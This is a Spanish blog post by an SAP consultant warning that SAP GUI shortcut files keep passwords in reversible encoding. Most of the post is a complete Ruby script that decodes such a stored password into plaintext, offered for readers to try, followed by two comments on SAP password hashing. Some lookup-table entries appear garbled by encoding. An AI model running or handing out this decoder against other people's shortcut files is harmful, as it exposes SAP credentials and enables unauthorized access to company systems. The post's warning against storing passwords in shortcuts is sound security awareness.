Decodificar la contraseña de acceso a SAP

Decodificar la contraseña de acceso a SAP

Los usuarios pueden crear un acceso directo con los datos de la conexión a SAP mediante el GUI. Hasta aquí nada nuevo, lo preocupante empieza cuanto este acceso directo que es, básicamente, un fichero que contiene la ruta al binario, el usuario y la contraseña codificada se puede decodificar con este pequeño script para mostrar el valor de la contraseña.

Así que ya sabes Consultor Basis, nada de accesos directos.

Os dejo el código en ruby para que lo probeis y me conteis.

#!/usr/bin/env ruby
#
# SAP Easy Access Password Decoder (Kernel 640)
# Supported character set A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!`
#
# Author: Mylestro
# Date: 17/02/2011
#

PROG_VER = 1.0

@one, @two, @three, @four, @five, @six, @seven, @eight = Hash.new
@master = Array.new

def populate_arrays
@one = {"19" => "a", "39" => "A", "1A" => "b", "3A" => "B", "1B" => "c", "3B" => "C", "1C" => "d", "3C" => "D", "1D" => "e", "3D" => "E", "1E" => "f", "3E" => "F", "1F" => "g", "3F" => "G", "10" => "h", "30" => "H", "11" => "i", "31" => "I", "12" => "j", "32" => "J", "13" => "k", "33" => "K", "14" => "l", "34" => "L", "15" => "m", "35" => "M", "16" => "n", "36" => "N", "17" => "o", "37" => "O", "08" => "p", "28" => "P", "09" => "q", "29" => "Q", "0A" => "r", "2A" => "R", "0B" => "s", "2B" => "S", "0C" => "t", "2C" => "T", "0D" => "u", "2D" => "U", "0E" => "v", "2E" => "V", "0F" => "w", "2F" => "W", "00" => "x", "20" => "X", "01" => "y", "21" => "Y", "02" => "z", "22" => "Z", "48" => "0", "49" => "1", "4A" => "2", "4B" => "3", "4C" => "4", "4D" => "5", "4E" => "6", "4F" => "7", "40" => "8", "41" => "9", "59" => "!", "5C" => "$", "DB" => "?", "5D" => "%", "38" => "@", "26" => "^", "52" => "*", "50" => "(", "51" => ")", "53" => "+", "45" => "=", "06" => "~", "5B" => "#", "44" => "< ", "46" => ">", "24" => "\\", "57" => "/", "47" => "?", "56" => ".", "54" => ",", "43" => ";", "42" => ":", "5F" => "'", "03" => "{", "05" => "}", "23" => "[", "25" => "]", "18" => "`", "04" => "|"}
@two = {"E0" => "a", "C0" => "A", "E3" => "b", "C3" => "B", "E2" => "c", "C2" => "C", "E5" => "d", "C5" => "D", "E4" => "e", "C4" => "E", "E7" => "f", "C7" => "F", "E6" => "g", "C6" => "G", "E9" => "h", "C9" => "H", "E8" => "i", "C8" => "I", "EB" => "j", "CB" => "J", "EA" => "k", "CA" => "K", "ED" => "l", "CD" => "L", "EC" => "m", "CC" => "M", "EF" => "n", "CF" => "N", "EE" => "o", "CE" => "O", "F1" => "p", "D1" => "P", "F0" => "q", "D0" => "Q", "F3" => "r", "D3" => "R", "F2" => "s", "D2" => "S", "F5" => "t", "D5" => "T", "F4" => "u", "D4" => "U", "F7" => "v", "D7" => "V", "F6" => "w", "D6" => "W", "F9" => "x", "D9" => "X", "F8" => "y", "D8" => "Y", "FB" => "z", "DB" => "Z", "B1" => "0", "B0" => "1", "B3" => "2", "B2" => "3", "B5" => "4", "B4" => "5", "B7" => "6", "B6" => "7", "B9" => "8", "B8" => "9", "A0" => "!", "A5" => "$", "22" => "?", "A4" => "%", "C1" => "@", "DF" => "^", "AB" => "*", "A9" => "(", "A8" => ")", "AA" => "+", "BC" => "=", "FF" => "~", "A2" => "#", "BD" => "< ", "BF" => ">", "DD" => "\\", "AE" => "/", "BE" => "?", "AF" => ".", "AD" => ",", "BA" => ";", "BB" => ":", "A6" => "'", "FA" => "{", "FC" => "}", "DA" => "[", "DC" => "]", "E1" => "`", "FD" => "|"}
@three = {"72" => "a", "52" => "A", "71" => "b", "51" => "B", "70" => "c", "50" => "C", "77" => "d", "57" => "D", "76" => "e", "56" => "E", "75" => "f", "55" => "F", "74" => "g", "54" => "G", "7B" => "h", "5B" => "H", "7A" => "i", "5A" => "I", "79" => "j", "59" => "J", "78" => "k", "58" => "K", "7F" => "l", "5F" => "L", "7E" => "m", "5E" => "M", "7D" => "n", "5D" => "N", "7C" => "o", "5C" => "O", "63" => "p", "43" => "P", "62" => "q", "42" => "Q", "61" => "r", "41" => "R", "60" => "s", "40" => "S", "67" => "t", "47" => "T", "66" => "u", "46" => "U", "65" => "v", "45" => "V", "64" => "w", "44" => "W", "6B" => "x", "4B" => "X", "6A" => "y", "4A" => "Y", "69" => "z", "49" => "Z", "23" => "0", "22" => "1", "21" => "2", "20" => "3", "27" => "4", "26" => "5", "25" => "6", "24" => "7", "2B" => "8", "2A" => "9", "32" => "!", "37" => "$", "B0" => "?", "36" => "%", "53" => "@", "4D" => "^", "39" => "*", "3B" => "(", "3A" => ")", "38" => "+", "2E" => "=", "6D" => "~", "30" => "#", "2F" => "< ", "2D" => ">", "4F" => "\\", "3C" => "/", "2C" => "?", "3D" => ".", "3F" => ",", "28" => ";", "29" => ":", "34" => "'", "68" => "{", "6E" => "}", "48" => "[", "4E" => "]", "73" => "`", "6F" => "|"}
@four = {"49" => "a", "69" => "A", "4A" => "b", "6A" => "B", "4B" => "c", "6B" => "C", "4C" => "d", "6C" => "D", "4D" => "e", "6D" => "E", "4E" => "f", "6E" => "F", "4F" => "g", "6F" => "G", "40" => "h", "60" => "H", "41" => "i", "61" => "I", "42" => "j", "62" => "J", "43" => "k", "63" => "K", "44" => "l", "64" => "L", "45" => "m", "65" => "M", "46" => "n", "66" => "N", "47" => "o", "67" => "O", "58" => "p", "78" => "P", "59" => "q", "79" => "Q", "5A" => "r", "7A" => "R", "5B" => "s", "7B" => "S", "5C" => "t", "7C" => "T", "5D" => "u", "7D" => "U", "5E" => "v", "7E" => "V", "5F" => "w", "7F" => "W", "50" => "x", "70" => "X", "51" => "y", "71" => "Y", "52" => "z", "72" => "Z", "18" => "0", "19" => "1", "1A" => "2", "1B" => "3", "1C" => "4", "1D" => "5", "1E" => "6", "1F" => "7", "10" => "8", "11" => "9", "09" => "!", "0C" => "$", "8B" => "?", "0D" => "%", "68" => "@", "76" => "^", "02" => "*", "00" => "(", "01" => ")", "03" => "+", "15" => "=", "56" => "~", "0B" => "#", "14" => "< ", "16" => ">", "74" => "\\", "07" => "/", "17" => "?", "06" => ".", "04" => ",", "13" => ";", "12" => ":", "0F" => "'", "53" => "{", "55" => "}", "73" => "[", "75" => "]", "48" => "`", "54" => "|"}
@five = {"81" => "a", "A1" => "A", "82" => "b", "A2" => "B", "83" => "c", "A3" => "C", "84" => "d", "A4" => "D", "85" => "e", "A5" => "E", "86" => "f", "A6" => "F", "87" => "g", "A7" => "G", "88" => "h", "A8" => "H", "89" => "i", "A9" => "I", "8A" => "j", "AA" => "J", "8B" => "k", "AB" => "K", "8C" => "l", "AC" => "L", "8D" => "m", "AD" => "M", "8E" => "n", "AE" => "N", "8F" => "o", "AF" => "O", "90" => "p", "B0" => "P", "91" => "q", "B1" => "Q", "92" => "r", "B2" => "R", "93" => "s", "B3" => "S", "94" => "t", "B4" => "T", "95" => "u", "B5" => "U", "96" => "v", "B6" => "V", "97" => "w", "B7" => "W", "98" => "x", "B8" => "X", "99" => "y", "B9" => "Y", "9A" => "z", "BA" => "Z", "D0" => "0", "D1" => "1", "D2" => "2", "D3" => "3", "D4" => "4", "D5" => "5", "D6" => "6", "D7" => "7", "D8" => "8", "D9" => "9", "C1" => "!", "C4" => "$", "43" => "?", "C5" => "%", "A0" => "@", "BE" => "^", "CA" => "*", "C8" => "(", "C9" => ")", "CB" => "+", "DD" => "=", "9E" => "~", "C3" => "#", "DC" => "< ", "DE" => ">", "BC" => "\\", "CF" => "/", "DF" => "?", "CE" => ".", "CC" => ",", "DB" => ";", "DA" => ":", "C7" => "'", "9B" => "{", "9D" => "}", "BB" => "[", "BD" => "]", "80" => "`", "9C" => "|"}
@six = {"A6" => "a", "86" => "A", "A5" => "b", "85" => "B", "A4" => "c", "84" => "C", "A3" => "d", "83" => "D", "A2" => "e", "82" => "E", "A1" => "f", "81" => "F", "A0" => "g", "80" => "G", "AF" => "h", "8F" => "H", "AE" => "i", "8E" => "I", "AD" => "j", "8D" => "J", "AC" => "k", "8C" => "K", "AB" => "l", "8B" => "L", "AA" => "m", "8A" => "M", "A9" => "n", "89" => "N", "A8" => "o", "88" => "O", "B7" => "p", "97" => "P", "B6" => "q", "96" => "Q", "B5" => "r", "95" => "R", "B4" => "s", "94" => "S", "B3" => "t", "93" => "T", "B2" => "u", "92" => "U", "B1" => "v", "91" => "V", "B0" => "w", "90" => "W", "BF" => "x", "9F" => "X", "BE" => "y", "9E" => "Y", "BD" => "z", "9D" => "Z", "F7" => "0", "F6" => "1", "F5" => "2", "F4" => "3", "F3" => "4", "F2" => "5", "F1" => "6", "F0" => "7", "FF" => "8", "FE" => "9", "E6" => "!", "E3" => "$", "64" => "?", "E2" => "%", "87" => "@", "99" => "^", "ED" => "*", "EF" => "(", "EE" => ")", "EC" => "+", "FA" => "=", "B9" => "~", "E4" => "#", "FB" => "< ", "F9" => ">", "9B" => "\\", "E8" => "/", "F8" => "?", "E9" => ".", "EB" => ",", "FC" => ";", "FD" => ":", "E0" => "'", "BC" => "{", "BA" => "}", "9C" => "[", "9A" => "]", "A7" => "`", "BB" => "|"}
@seven = {"61" => "a", "41" => "A", "62" => "b", "42" => "B", "63" => "c", "43" => "C", "64" => "d", "44" => "D", "65" => "e", "45" => "E", "66" => "f", "46" => "F", "67" => "g", "47" => "G", "68" => "h", "48" => "H", "69" => "i", "49" => "I", "6A" => "j", "4A" => "J", "6B" => "k", "4B" => "K", "6C" => "l", "4C" => "L", "6D" => "m", "4D" => "M", "6E" => "n", "4E" => "N", "6F" => "o", "4F" => "O", "70" => "p", "50" => "P", "71" => "q", "51" => "Q", "72" => "r", "52" => "R", "73" => "s", "53" => "S", "74" => "t", "54" => "T", "75" => "u", "55" => "U", "76" => "v", "56" => "V", "77" => "w", "57" => "W", "78" => "x", "58" => "X", "79" => "y", "59" => "Y", "7A" => "z", "5A" => "Z", "30" => "0", "31" => "1", "32" => "2", "33" => "3", "34" => "4", "35" => "5", "36" => "6", "37" => "7", "38" => "8", "39" => "9", "21" => "!", "24" => "$", "A3" => "?", "25" => "%", "40" => "@", "5E" => "^", "2A" => "*", "28" => "(", "29" => ")", "2B" => "+", "3D" => "=", "7E" => "~", "23" => "#", "3C" => "< ", "3E" => ">", "5C" => "\\", "2F" => "/", "3F" => "?", "2E" => ".", "2C" => ",", "3B" => ";", "3A" => ":", "27" => "'", "7B" => "{", "7D" => "}", "5B" => "[", "5D" => "]", "60" => "`", "7C" => "|"}
@eight = {"5F" => "a", "7F" => "A", "5C" => "b", "7C" => "B", "5D" => "c", "7D" => "C", "5A" => "d", "7A" => "D", "5B" => "e", "7B" => "E", "58" => "f", "78" => "F", "59" => "g", "79" => "G", "56" => "h", "76" => "H", "57" => "i", "77" => "I", "54" => "j", "74" => "J", "55" => "k", "75" => "K", "52" => "l", "72" => "L", "53" => "m", "73" => "M", "50" => "n", "70" => "N", "51" => "o", "71" => "O", "4E" => "p", "6E" => "P", "4F" => "q", "6F" => "Q", "4C" => "r", "6C" => "R", "4D" => "s", "6D" => "S", "4A" => "t", "6A" => "T", "4B" => "u", "6B" => "U", "48" => "v", "68" => "V", "49" => "w", "69" => "W", "46" => "x", "66" => "X", "47" => "y", "67" => "Y", "44" => "z", "64" => "Z", "0E" => "0", "0F" => "1", "0C" => "2", "0D" => "3", "0A" => "4", "0B" => "5", "08" => "6", "09" => "7", "06" => "8", "07" => "9", "1F" => "!", "1A" => "$", "9D" => "?", "1B" => "%", "7E" => "@", "60" => "^", "14" => "*", "16" => "(", "17" => ")", "15" => "+", "03" => "=", "40" => "~", "1D" => "#", "02" => "< ", "00" => ">", "62" => "\\", "11" => "/", "01" => "?", "10" => ".", "12" => ",", "05" => ";", "04" => ":", "19" => "'", "45" => "{", "43" => "}", "65" => "[", "63" => "]", "5E" => "`", "42" => "|"}
@master[1] = @one
@master[2] = @two
@master[3] = @three
@master[4] = @four
@master[5] = @five
@master[6] = @six
@master[7] = @seven
@master[8] = @eight
end

def char_lookup(position,current_char)
temp = @master[position]
print temp[current_char]
end

begin
populate_arrays
if ARGV.size != 1
puts "[-] Invalid number of arguments"
exit
end
hash = ARGV[0].split("PW_")
if hash[1].length > 16
puts "[-] Password is over 8 characters, not supported"
exit
end
hash = hash[1]

if hash.length % 2 != 0
puts "[-] Invalid hash length"
exit
end

hash_size = hash.length / 2
print "[+] Decoded password: "
position = 1
value = 0
hash_size.times do
current_char = hash[value,2]
char_lookup(position,current_char)
value = value + 2
position = position.next
#sleep(1)
end
end

via: msploit

Antonio Mejias - cyfuss

Antonio Mejias - cyfuss

Soy Antonio Mejias en la vida real, cyfuss en las redes, Coordinador funcional OpenText - SAP en mi vida laboral y demasiados hobbies el resto del tiempo. Si estás interesado en contactar no dudes en hacerlo, será un placer hablar contigo. Si quieres saber más de mi, puedes pasarte por http://cyfuss.com/sobre-mi.

2 thoughts on “Decodificar la contraseña de acceso a SAP

  • 04/01/2016 at 18:52
    Permalink

    Hola Antonio.

    ¿cómo se puede verificar el usuario sap (B1) via web?, por lo que he visto, en la tabla USR0 está el campo nick, la clave encriptada y un campo salt. ¿que función de encriptación se usa para almacenar la clave?

    Gracias.

    Reply
    • Antonio Mejias - cyfuss
      08/01/2016 at 20:59
      Permalink

      Hola Manuel,

      No estoy muy seguro de la función de encriptación que use el standard de SAP (depende de la versión puede ser MD5 o SHA-1), lo que sí te puedo decir, en caso de que necesites cifrar alguna contraseña via ABAP, es que puedes usar el módulo de función: FIEB_PASSWORD_ENCRYPT para cifrarla y FIEB_PASSWORD_DECRYPT para descifrarla.

      Espero haberte podido ayudar…

      saludos
      Antonio

      Reply

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Trece − 8 =